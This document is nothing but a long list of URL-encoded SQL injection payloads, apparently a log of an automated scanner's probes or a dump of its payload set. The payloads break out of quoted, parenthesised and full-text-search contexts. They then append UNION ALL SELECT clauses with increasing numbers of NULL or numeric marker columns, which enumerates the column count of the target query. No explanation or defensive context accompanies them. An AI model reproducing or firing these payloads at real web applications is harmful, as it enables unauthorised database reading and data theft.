1234.5%27%20%2B%20%28SELECT%20%27iikX%27%20FROM%20DUAL%20WHERE%209192%3D9192%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27MtaG%27%20FROM%20DUAL%20WHERE%203011%3D3011%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27pVPG%27%20FROM%20DUAL%20WHERE%202559%3D2559%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27uurs%27%20FROM%20DUAL%20WHERE%204912%3D4912%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27bgSd%27%20FROM%20DUAL%20WHERE%201780%3D1780%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27AnnD%27%20FROM%20DUAL%20WHERE%209357%3D9357%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27kiKT%27%20WHERE%209037%3D9037%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27PIOU%27%20WHERE%205861%3D5861%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27FcjU%27%20WHERE%203824%3D3824%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27PsOV%27%20WHERE%203865%3D3865%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27qKKQ%27%20WHERE%201805%3D1805%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27lnYc%27%20WHERE%206263%3D6263%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27lmBl%27%20WHERE%206298%3D6298%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27DTgS%27%20WHERE%206029%3D6029%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27LnmY%27%20WHERE%208315%3D8315%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27rpyM%27%20WHERE%203140%3D3140%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 -4644%29%20UNION%20ALL%20SELECT%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133--%20 -7413%29%20UNION%20ALL%20SELECT%203794%2C%203794%2C%203794%2C%203794%2C%203794%2C%203794%2C%203794%2C%203794%2C%203794%2C%203794%2C%203794%2C%203794%2C%203794%2C%203794%2C%203794%2C%203794%2C%203794%2C%203794%2C%203794%2C%203794%2C%203794%2C%203794--%20 -7913%29%20UNION%20ALL%20SELECT%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631%2C%204631--%20 -7082%29%20UNION%20ALL%20SELECT%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622--%20 -2939%29%20UNION%20ALL%20SELECT%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908%2C%205908--%20 -6211%29%20UNION%20ALL%20SELECT%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658%2C%208658--%20 -4505%29%20UNION%20ALL%20SELECT%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147--%20 -9593%29%20UNION%20ALL%20SELECT%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445--%20 -2788%29%20UNION%20ALL%20SELECT%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259%2C%201259--%20 -8654%29%20UNION%20ALL%20SELECT%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360--%20 -1627%27%29%20UNION%20ALL%20SELECT%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577%2C%204577--%20 -7059%27%29%20UNION%20ALL%20SELECT%203739%2C%203739%2C%203739%2C%203739%2C%203739%2C%203739%2C%203739%2C%203739%2C%203739%2C%203739%2C%203739%2C%203739%2C%203739%2C%203739%2C%203739%2C%203739%2C%203739%2C%203739%2C%203739%2C%203739%2C%203739%2C%203739--%20 -7615%27%29%20UNION%20ALL%20SELECT%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119--%20 -5893%27%29%20UNION%20ALL%20SELECT%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657%2C%205657--%20 -6622%27%29%20UNION%20ALL%20SELECT%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966%2C%205966--%20 -5007%27%29%20UNION%20ALL%20SELECT%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168--%20 -3919%27%29%20UNION%20ALL%20SELECT%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513%2C%209513--%20 -5262%27%29%20UNION%20ALL%20SELECT%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407%2C%204407--%20 -5359%27%29%20UNION%20ALL%20SELECT%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490--%20 -2518%27%29%20UNION%20ALL%20SELECT%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542--%20 -7357%27%20UNION%20ALL%20SELECT%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196--%20 -2003%27%20UNION%20ALL%20SELECT%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900--%20 -4279%27%20UNION%20ALL%20SELECT%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945%2C%201945--%20 -3317%27%20UNION%20ALL%20SELECT%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086%2C%209086--%20 -7437%27%20UNION%20ALL%20SELECT%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739--%20 -9648%27%20UNION%20ALL%20SELECT%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956--%20 -8047%27%20UNION%20ALL%20SELECT%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024%2C%201024--%20 -9394%27%20UNION%20ALL%20SELECT%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756%2C%201756--%20 -2207%27%20UNION%20ALL%20SELECT%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590--%20 -6707%27%20UNION%20ALL%20SELECT%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944%2C%202944--%20 -1619%22%20UNION%20ALL%20SELECT%207421%2C%207421%2C%207421%2C%207421%2C%207421%2C%207421%2C%207421%2C%207421%2C%207421%2C%207421%2C%207421%2C%207421%2C%207421%2C%207421%2C%207421%2C%207421%2C%207421%2C%207421%2C%207421%2C%207421%2C%207421--%20 -7994%22%20UNION%20ALL%20SELECT%206850%2C%206850%2C%206850%2C%206850%2C%206850%2C%206850%2C%206850%2C%206850%2C%206850%2C%206850%2C%206850%2C%206850%2C%206850%2C%206850%2C%206850%2C%206850%2C%206850%2C%206850%2C%206850%2C%206850%2C%206850%2C%206850--%20 -4868%22%20UNION%20ALL%20SELECT%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333%2C%209333--%20 -9033%22%20UNION%20ALL%20SELECT%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485%2C%205485--%20 -4442%22%20UNION%20ALL%20SELECT%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456%2C%205456--%20 -6991%22%20UNION%20ALL%20SELECT%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793%2C%202793--%20 -7671%22%20UNION%20ALL%20SELECT%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233%2C%203233--%20 -1653%22%20UNION%20ALL%20SELECT%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867--%20 -1244%22%20UNION%20ALL%20SELECT%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123%2C%206123--%20 -3396%22%20UNION%20ALL%20SELECT%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347--%20 -7552%29%20UNION%20ALL%20SELECT%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443%2C%208443--%20%20AND%20%282948%3D2948 -9532%29%20UNION%20ALL%20SELECT%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168%2C%203168--%20%20AND%20%288046%3D8046 -7769%29%20UNION%20ALL%20SELECT%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835%2C%203835--%20%20AND%20%285816%3D5816 -4402%29%20UNION%20ALL%20SELECT%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113%2C%208113--%20%20AND%20%284928%3D4928 -1194%29%20UNION%20ALL%20SELECT%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959--%20%20AND%20%289036%3D9036 